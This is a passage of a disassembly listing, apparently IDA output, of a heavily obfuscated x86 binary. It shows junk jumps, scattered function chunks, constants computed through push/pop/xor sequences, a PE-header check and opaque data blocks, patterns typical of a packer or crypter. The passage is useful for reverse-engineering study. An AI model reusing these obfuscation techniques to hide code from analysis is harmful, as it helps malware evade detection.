jmp loc_432315
; END OF FUNCTION CHUNK FOR sub_42E12B
; ---------------------------------------------------------------------------
jo loc_431E08
jmp sub_430110
; ---------------------------------------------------------------------------
loc_431B48: ; DATA XREF: sub_430273-20CA�o
push 0C4BDB70Eh
pop edx
call sub_42FD11
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
sbb eax, 76E5AF57h
jmp sub_42E713
; ---------------------------------------------------------------------------
jno loc_430F2F
jg loc_43283E
jmp sub_4300EC
; ---------------------------------------------------------------------------
loc_431B70: ; DATA XREF: sub_42EBA9+5A�o
mov [esi], eax
pop esi
mov eax, [ebp-4]
cmp word ptr [eax], 5A4Dh
jmp loc_4310AD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_79. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_431B81: ; CODE XREF: sub_4315A4+CBD�j
jmp loc_430B22
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
xchg ebx, edx
jmp sub_43058C
; ---------------------------------------------------------------------------
adc edx, esi
sub eax, 0B2985C2h
jmp sub_432096
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431BAC
loc_431B9A: ; CODE XREF: sub_431BAC:loc_430746�j
pop edi
mov [ebp-4], eax
inc dword ptr [ebp-0Ch]
call sub_42FB98
loc_431BA6: ; CODE XREF: sub_42EACE+B�j
jmp nullsub_38
; END OF FUNCTION CHUNK FOR sub_431BAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_431BAC proc near ; CODE XREF: sub_42EA28+6�p
; j8.b78ws:004327CA�j
; FUNCTION CHUNK AT 00430746 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431B9A SIZE 00000011 BYTES
xchg esi, [esp+0]
pop esi
push edi
push 914A8E91h
pop edi
xor edi, 914A8EB9h
add eax, edi
jmp loc_430746
sub_431BAC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E2FE
loc_431BC4: ; CODE XREF: j8.b78ws:loc_42E61B�j
; sub_42E2FE:loc_4305E2�j
call sub_42EA96
; END OF FUNCTION CHUNK FOR sub_42E2FE
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431BC9: ; CODE XREF: sub_43119E+DE�j
jmp loc_431593
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_431BCE: ; CODE XREF: sub_43094F+37�j
jmp loc_42FF89
; END OF FUNCTION CHUNK FOR sub_43094F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_431BD3: ; CODE XREF: sub_4308AB+13�j
jmp loc_4323BD
; END OF FUNCTION CHUNK FOR sub_4308AB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_431BD9: ; CODE XREF: j8.b78ws:004322FB�j
jmp loc_430336
; ---------------------------------------------------------------------------
test ebp, edi
jmp loc_430C26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431908
loc_431BE5: ; CODE XREF: sub_431908-ADA�j
push eax
call sub_42E2A1
; END OF FUNCTION CHUNK FOR sub_431908
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_431BEB: ; CODE XREF: sub_4306C9+123A�j
call sub_42E6B3
loc_431BF0: ; CODE XREF: sub_430273:loc_4316E3�j
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
inc [ebp+var_1C]
jmp loc_431A62
; END OF FUNCTION CHUNK FOR sub_4306C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E174
loc_431BFE: ; CODE XREF: sub_42E174+A�j
inc dword ptr [ebp-1Ch]
jmp loc_42FBBF
; END OF FUNCTION CHUNK FOR sub_42E174
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4313E5
loc_431C06: ; CODE XREF: j8.b78ws:loc_42E52D�j
; sub_4313E5+3�j
inc dword ptr [ebp-18h]
jmp loc_430B47
; END OF FUNCTION CHUNK FOR sub_4313E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BB5
loc_431C0E: ; CODE XREF: sub_430BB5+18�j
mov esp, ebp
pop ebp
loc_431C11: ; CODE XREF: j8.b78ws:0042E39E�j
push ds:dword_42E0A4
retn
; END OF FUNCTION CHUNK FOR sub_430BB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43131C
loc_431C18: ; CODE XREF: sub_43131C+4�j
mov eax, [ebp-1Ch]
mov al, [eax]
call sub_431651
; END OF FUNCTION CHUNK FOR sub_43131C
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431C22: ; CODE XREF: sub_43119E-2B57�j
jmp loc_43187A
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
db 0B5h
dd 0
dword_431C2C dd 0 ; sub_431F6D+8�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E10C
loc_431C30: ; CODE XREF: sub_42E10C+B�j
jmp loc_42E767
; END OF FUNCTION CHUNK FOR sub_42E10C
; ---------------------------------------------------------------------------
db 2Ah, 0ACh, 0B6h
dword_431C38 dd 0 ; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43285C
loc_431C3C: ; CODE XREF: sub_43285C-1104�j
jmp loc_430EF6
; END OF FUNCTION CHUNK FOR sub_43285C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_431C41: ; CODE XREF: sub_430C91+29F�j
jmp loc_4306A8
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
loc_431C46: ; CODE XREF: j8.b78ws:0042EA4E�j
jmp loc_430668
; ---------------------------------------------------------------------------
db 0AFh
dword_431C4C dd 0 ; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5CA
loc_431C55: ; CODE XREF: sub_42E5CA+1A84�j
jmp loc_432006
; END OF FUNCTION CHUNK FOR sub_42E5CA
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
db 83h
dd 75626603h, 0C43F6374h, 73AD2B50h, 0E611B7A7h, 68A0E3Bh
dd 47078846h, 775DB01h, 0EE831E8Bh, 72DB11FCh, 5301B8EDh
dd 0DB01B31Ch, 1E8B0775h, 11FCEE83h, 1C011DBh, 75EF77DBh
dd 831E8B09h
db 0EEh, 0FCh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_431CA2: ; CODE XREF: sub_4307FC:loc_42F948�j
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
push offset loc_431993
jmp nullsub_41
; END OF FUNCTION CHUNK FOR sub_4307FC
; =============== S U B R O U T I N E =======================================
sub_431CB2 proc near ; DATA XREF: sub_42EBA9+2E�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0042EE1A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042FB15 SIZE 00000010 BYTES
push eax
push edi
push 4E4AD41h
pop edi
and edi, 0D7E752Ah
add edi, 0BC239F79h
jmp loc_42EE1A
sub_431CB2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBA9
loc_431CCB: ; CODE XREF: sub_42EBA9+86�j
jnz loc_430C33
mov eax, [ebp+var_4]
call sub_430C2C
loc_431CD9: ; CODE XREF: sub_43137D-319F�j
jmp loc_430F08
; END OF FUNCTION CHUNK FOR sub_42EBA9
; =============== S U B R O U T I N E =======================================
sub_431CDE proc near ; CODE XREF: sub_4327C0:loc_42E47D�p
; j8.b78ws:0043261E�j
mov [esp+0], eax
pop eax
push ecx
call sub_431F53
loc_431CE8: ; CODE XREF: sub_4315A4-1169�j
jmp nullsub_42
sub_431CDE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430223
loc_431CED: ; CODE XREF: sub_430223:loc_42E70E�j
mov eax, [eax-10h]
call sub_430D6A
; END OF FUNCTION CHUNK FOR sub_430223
; START OF FUNCTION CHUNK FOR sub_42E3FA
loc_431CF5: ; CODE XREF: sub_42E3FA+1E�j
; sub_432112:loc_42E9F9�j ...
jnb loc_432665
test byte ptr [ebp-8], 2
call sub_4301B9
loc_431D04: ; CODE XREF: sub_430273-20C5�j
jmp nullsub_43
; END OF FUNCTION CHUNK FOR sub_42E3FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431D09: ; CODE XREF: sub_43119E:loc_4312AC�j
push offset sub_430180
jmp j_nullsub_44
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_431D13 proc near ; CODE XREF: sub_42FB98+11F3�j
retn
sub_431D13 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_431D14: ; CODE XREF: sub_4308AB:loc_430065�j
cmp eax, ebx
jmp loc_431884
; END OF FUNCTION CHUNK FOR sub_4308AB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
start_0 proc near ; CODE XREF: start�j
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_24 = dword ptr -24h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00420001 SIZE 0000004A BYTES
; FUNCTION CHUNK AT 0042CADA SIZE 000001B4 BYTES
; FUNCTION CHUNK AT 0042CC8F SIZE 00000002 BYTES
call nullsub_4
jmp loc_42CADA
start_0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320AE
loc_431D26: ; CODE XREF: sub_4320AE-2617�j
jmp loc_431375
; END OF FUNCTION CHUNK FOR sub_4320AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov [esp], ebp
mov ebp, esp
add esp, 0FFFFFFCCh
lea eax, nullsub_4
call sub_4318B3
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_431D45: ; CODE XREF: sub_42ED88:loc_43103D�j
cmp eax, ds:dword_432504
jz loc_42ED99
mov eax, [ebp-4]
inc eax
mov eax, [eax]
jmp loc_42F77B
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
push edx
jmp sub_42E9DA
; =============== S U B R O U T I N E =======================================
sub_431D62 proc near ; CODE XREF: sub_430C2C-D34�p
; j8.b78ws:0042FF4B�j
xchg edi, [esp+0]
pop edi
mov esp, ebp
pop ebp
jmp nullsub_46
sub_431D62 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C2C
loc_431D6E: ; CODE XREF: sub_430C2C:loc_430C3B�j
push offset loc_432343
jmp sub_431502
; END OF FUNCTION CHUNK FOR sub_430C2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E8A6
loc_431D78: ; CODE XREF: sub_42E8A6+9�j
mov esp, ebp
pop ebp
mov eax, ds:dword_42E098
or eax, eax
call sub_43217F
loc_431D88: ; CODE XREF: j8.b78ws:00431A11�j
jmp sub_430478
; END OF FUNCTION CHUNK FOR sub_42E8A6
; ---------------------------------------------------------------------------
loc_431D8D: ; CODE XREF: j8.b78ws:0042F900�j
jmp loc_43247B
; ---------------------------------------------------------------------------
or edx, 94053EDAh
ror ebp, 5
jmp sub_43044A
; =============== S U B R O U T I N E =======================================
sub_431DA0 proc near ; CODE XREF: j8.b78ws:004310C2�p
; FUNCTION CHUNK AT 0043186B SIZE 0000000F BYTES
xchg ebp, [esp+0]
mov ebp, [esp+0]
mov eax, [ebp+8]
mov ecx, [eax]
add eax, 4
jmp loc_43186B
sub_431DA0 endp
; ---------------------------------------------------------------------------
loc_431DB3: ; CODE XREF: j8.b78ws:00430406�j
jz loc_4307D0
jmp loc_430F35
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_431DBE: ; CODE XREF: sub_4315A4-322E�j
shl ebx, 16h
; END OF FUNCTION CHUNK FOR sub_4315A4
; START OF FUNCTION CHUNK FOR sub_42FAE7
loc_431DC1: ; CODE XREF: sub_42FAE7:loc_4316EE�j
call sub_432300
push offset loc_430860
jmp nullsub_64
; END OF FUNCTION CHUNK FOR sub_42FAE7
; ---------------------------------------------------------------------------
loc_431DD0: ; DATA XREF: sub_430148-1294�o
imul dword ptr [edx-4]
add eax, 2
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
add [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
jmp loc_42E075
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430323
loc_431DE9: ; CODE XREF: sub_430323:loc_42FDCF�j
pop ebp
push ds:dword_42E06C
retn
; END OF FUNCTION CHUNK FOR sub_430323
; =============== S U B R O U T I N E =======================================
sub_431DF1 proc near ; CODE XREF: sub_43082D-23E0�p
; sub_43082D+E4C�p
; FUNCTION CHUNK AT 00431927 SIZE 0000000E BYTES
mov eax, cs
xor al, al
or eax, eax
jnz loc_43192F
call sub_4307FC
jmp loc_431927
sub_431DF1 endp
; ---------------------------------------------------------------------------
loc_431E07: ; CODE XREF: j8.b78ws:0042FB61�j
pop ecx
loc_431E08: ; CODE XREF: j8.b78ws:00431B3D�j
add ecx, 86E1A774h
xchg ecx, [esp]
jmp loc_4301A2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431E1C: ; CODE XREF: sub_43119E+179�j
jmp loc_43274C
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_431E21: ; CODE XREF: sub_430EAC-926�j
jmp loc_4309DC
; END OF FUNCTION CHUNK FOR sub_430EAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E78A
loc_431E26: ; CODE XREF: sub_42E78A+3B8�j
jnz loc_42EB34
retn
; END OF FUNCTION CHUNK FOR sub_42E78A
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E78A
loc_431E32: ; CODE XREF: sub_42E78A:loc_42EB34�j
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_42EB34
retn
; END OF FUNCTION CHUNK FOR sub_42E78A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E873
loc_431E41: ; CODE XREF: sub_42E873:loc_42F748�j
sub eax, 0ADDBBF64h
loc_431E47: ; CODE XREF: j8.b78ws:0042F851�j
mov esi, 930EB192h
jmp loc_431E93
; END OF FUNCTION CHUNK FOR sub_42E873
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316AB
loc_431E51: ; CODE XREF: sub_4316AB:loc_4309AC�j
call sub_4301DE
loc_431E56: ; DATA XREF: j8.b78ws:00430CCD�o
mov eax, [ebp+var_4]
push eax
call sub_430D9F
loc_431E5F: ; CODE XREF: sub_4304C6+10�j
jmp loc_432572
; END OF FUNCTION CHUNK FOR sub_4316AB
; ---------------------------------------------------------------------------
loc_431E64: ; CODE XREF: j8.b78ws:0042EB14�j
jmp locret_4301F2
; =============== S U B R O U T I N E =======================================
sub_431E69 proc near ; CODE XREF: j8.b78ws:0042E003�j
; sub_42E381+3C88�p
xchg edx, [esp+0]
pop edx
mov esp, ebp
pop ebp
retn
sub_431E69 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43237F
loc_431E71: ; CODE XREF: sub_43237F+17�j
jmp loc_430701
; END OF FUNCTION CHUNK FOR sub_43237F
; =============== S U B R O U T I N E =======================================
sub_431E76 proc near ; CODE XREF: j8.b78ws:loc_42F9CA�j
; sub_43119E:loc_430537�p
; FUNCTION CHUNK AT 0042F9CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004303ED SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
push ecx
mov ecx, ebp
xchg ecx, [esp+0]
jmp loc_4303ED
sub_431E76 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_431E85: ; CODE XREF: j8.b78ws:0043078B�j
jnb nullsub_24
shr ecx, 14h
jmp sub_42E32F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E873
loc_431E93: ; CODE XREF: sub_42E873+35D9�j
jnz loc_432647
not ebp
or edx, edi
loc_431E9D: ; CODE XREF: sub_42E873:loc_43241E�j
call sub_432300
jmp loc_4317B1
; END OF FUNCTION CHUNK FOR sub_42E873
; =============== S U B R O U T I N E =======================================
sub_431EA7 proc near ; DATA XREF: j8.b78ws:0042F828�o
arg_0 = dword ptr 4
add ecx, 30053678h
popf
xchg ecx, [esp-4+arg_0]
jmp sub_430662
sub_431EA7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431EB6: ; CODE XREF: sub_43119E-DE9�j
call sub_432702
push eax
rol eax, 0Ch
mov ds:dword_4312C8, eax
jmp nullsub_53
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_431ECB: ; DATA XREF: sub_430D6A+10�o
and eax, 7
call sub_431A7B
; =============== S U B R O U T I N E =======================================
sub_431ED3 proc near ; CODE XREF: sub_431CB2-2192�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00431779 SIZE 00000005 BYTES
push ebx
pushf
push 22E311C4h
pop ebx
sub ebx, 4B77049Ah
add ebx, 28D6FED7h
popf
xchg ebx, [esp+4+var_4]
jmp loc_431779
sub_431ED3 endp
; ---------------------------------------------------------------------------
loc_431EF0: ; CODE XREF: j8.b78ws:loc_42FBCE�j
pushf
sbb esi, 97C12F0Dh
xchg edx, eax
jmp loc_42FE06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430D9F
loc_431EFE: ; CODE XREF: sub_430D9F+13�j
lea eax, [ebp-14h]
push eax
push 2DAD1D7Eh
xchg ebx, [esp+4+var_4]
mov eax, ebx
jmp loc_42E840
; END OF FUNCTION CHUNK FOR sub_430D9F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_48. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_431F17 proc near ; DATA XREF: sub_4315A4+CCB�o
jz loc_430B22
call sub_42EC9C
sub_431F17 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43133D
loc_431F22: ; CODE XREF: sub_43133D+18�j
jmp loc_42FAD9
; END OF FUNCTION CHUNK FOR sub_43133D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_28. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_431F28: ; CODE XREF: sub_42ED88+37AC�j
jmp loc_430B2D
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432786
loc_431F2D: ; CODE XREF: sub_432786+9�j
cmp [ebp+var_1], 0
jz loc_42E666
call sub_432715
; END OF FUNCTION CHUNK FOR sub_432786
; START OF FUNCTION CHUNK FOR sub_43058C
loc_431F3C: ; CODE XREF: sub_43058C-1D76�j
jmp loc_4319DE
; END OF FUNCTION CHUNK FOR sub_43058C
; =============== S U B R O U T I N E =======================================
sub_431F41 proc near ; CODE XREF: sub_42E574�j
; j8.b78ws:0042FCD5�j ...
; FUNCTION CHUNK AT 004304E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431107 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00431822 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00432514 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xor eax, eax
push esi
push 32C64B63h
jmp loc_4304E1
sub_431F41 endp
; ---------------------------------------------------------------------------
loc_431F52: ; CODE XREF: j8.b78ws:0042F8DF�j
cdq
; =============== S U B R O U T I N E =======================================
sub_431F53 proc near ; CODE XREF: sub_431CDE+5�p
mov [esp+0], edx
pop edx
push 344D3335h
add dword ptr [esp+0], 0CBB2CCBCh
push offset sub_42E699
jmp nullsub_49
sub_431F53 endp
; =============== S U B R O U T I N E =======================================
sub_431F6D proc near ; CODE XREF: j8.b78ws:0042EABF�j
; sub_430D58-9FC�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E0D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E25B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042F86C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FCDA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00430135 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00430234 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043175E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004317C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004322D0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00432310 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_431C2C
or eax, eax
jmp loc_43175E
sub_431F6D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_431F82: ; CODE XREF: sub_4314D8+DC6�j
push 4A0C86BFh
jmp loc_43002D
; END OF FUNCTION CHUNK FOR sub_4314D8
; =============== S U B R O U T I N E =======================================
sub_431F8C proc near ; CODE XREF: sub_4321A8+7�p
mov [esp+0], eax
call sub_430B64
call sub_42F893
retn
sub_431F8C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_431F9A: ; CODE XREF: sub_4307FC+202A�j
jmp loc_42F948
; END OF FUNCTION CHUNK FOR sub_4307FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431F9F: ; CODE XREF: sub_43119E+AB�j
test esi, 0F5C9CB90h
jmp loc_430BAF
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
mov edx, 0CB804A30h
call sub_432702
push eax
rol eax, 3
mov ds:dword_43007C, eax
retn
; ---------------------------------------------------------------------------
loc_431FBF: ; CODE XREF: j8.b78ws:0042FE16�j
jmp loc_42F7EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43194A
loc_431FC4: ; CODE XREF: sub_43194A-2F37�j
jmp loc_431A03
; END OF FUNCTION CHUNK FOR sub_43194A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_431FC9: ; CODE XREF: sub_43119E-BAF�j
ror eax, 3
push eax
jmp j_nullsub_50
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_89. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test edi, 3C1DCD84h
jmp loc_43063D
; ---------------------------------------------------------------------------
loc_431FE3: ; DATA XREF: sub_42E381+363F�o
shl eax, 2
cdq
add eax, [esp]
jno loc_42ECED
adc edx, [esp+4]
jmp loc_42F74D
; ---------------------------------------------------------------------------
loc_431FF9: ; DATA XREF: sub_42FA02+2E4A�o
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
mov [ebp-0Ch], eax
; START OF FUNCTION CHUNK FOR sub_42E381
loc_432006: ; CODE XREF: sub_43119E-2FB4�j
; sub_42E381+7�j ...
mov eax, [ebp-0Ch]
call sub_431E69
xor eax, ebp
jmp sub_42E381
; END OF FUNCTION CHUNK FOR sub_42E381
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43058C
loc_432015: ; CODE XREF: sub_43058C:loc_4319F9�j
jns loc_43083E
jmp loc_42F905
; END OF FUNCTION CHUNK FOR sub_43058C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E934
loc_432020: ; CODE XREF: sub_42E934:loc_4316A6�j
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
loc_43202C: ; CODE XREF: j8.b78ws:loc_42F8A4�j
call sub_43058C
loc_432031: ; CODE XREF: sub_43285C-1963�j
jmp loc_43051F
; END OF FUNCTION CHUNK FOR sub_42E934
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430EAC
loc_432036: ; CODE XREF: sub_430EAC-888�j
; sub_430EAC:loc_4309DC�j
call sub_432300
mov edx, 3CC6743Ch
call sub_432702
push 0C91A8E9Fh
jmp loc_43098B
; END OF FUNCTION CHUNK FOR sub_430EAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA8A
loc_43204F: ; CODE XREF: sub_42EA8A:loc_4326C6�j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-8], eax
call sub_42EECE
jz loc_432441
jmp sub_431A7B
; END OF FUNCTION CHUNK FOR sub_42EA8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431117
loc_432067: ; CODE XREF: sub_431117+A�j
call sub_43137D
loc_43206C: ; CODE XREF: j8.b78ws:0043254C�j
jmp loc_431273
; END OF FUNCTION CHUNK FOR sub_431117
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_432071: ; CODE XREF: sub_4301B9+C60�j
push offset sub_430848
jmp j_nullsub_52
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_43207B: ; CODE XREF: sub_4321C5:loc_42E3F5�j
jz loc_430D84
jmp loc_42E04C
; END OF FUNCTION CHUNK FOR sub_4321C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432702
loc_432086: ; CODE XREF: sub_432702:loc_4304DC�j
jns sub_42E934
push offset sub_430A4D
jmp loc_42FE8F
; END OF FUNCTION CHUNK FOR sub_432702
; =============== S U B R O U T I N E =======================================
sub_432096 proc near ; CODE XREF: sub_42EBA9+2362�p
; j8.b78ws:00431B95�j
arg_8 = dword ptr 0Ch
mov [esp+0], ebx
pop ebx
popf
pop ecx
xchg ecx, [esp-0Ch+arg_8]
mov ebp, ecx
pop ecx
retn 4
sub_432096 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC7D
loc_4320A5: ; CODE XREF: sub_42EC7D:loc_42FE82�j
mov ebp, offset sub_4320AE
xchg ebp, [esp-4+arg_0]
retn
; END OF FUNCTION CHUNK FOR sub_42EC7D
; =============== S U B R O U T I N E =======================================
sub_4320AE proc near ; DATA XREF: sub_42EC7D:loc_4320A5�o
; FUNCTION CHUNK AT 0042FA91 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004309A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431375 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00431D26 SIZE 00000005 BYTES
mov eax, ds:dword_4312C8
or eax, eax
jnz loc_4300B9
jmp loc_4309A7
sub_4320AE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E699
loc_4320C1: ; CODE XREF: sub_42E699:loc_42E6AE�j
mov edx, [edx]
push edx
push eax
push eax
push 18440DA0h
pop eax
jmp loc_4305CE
; END OF FUNCTION CHUNK FOR sub_42E699
; =============== S U B R O U T I N E =======================================
sub_4320D1 proc near ; CODE XREF: j8.b78ws:00430ADF�j
; sub_42E487+40DC�p
; FUNCTION CHUNK AT 0042FFF8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004303E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430440 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004309B1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00430B97 SIZE 00000009 BYTES
xchg ebx, [esp+0]
pop ebx
cmp dword ptr [eax-4], 4
jnz loc_43000A
cmp dword ptr [ebp-10h], 0
jnz loc_4309B1
push offset sub_4304C6
jmp nullsub_55
sub_4320D1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
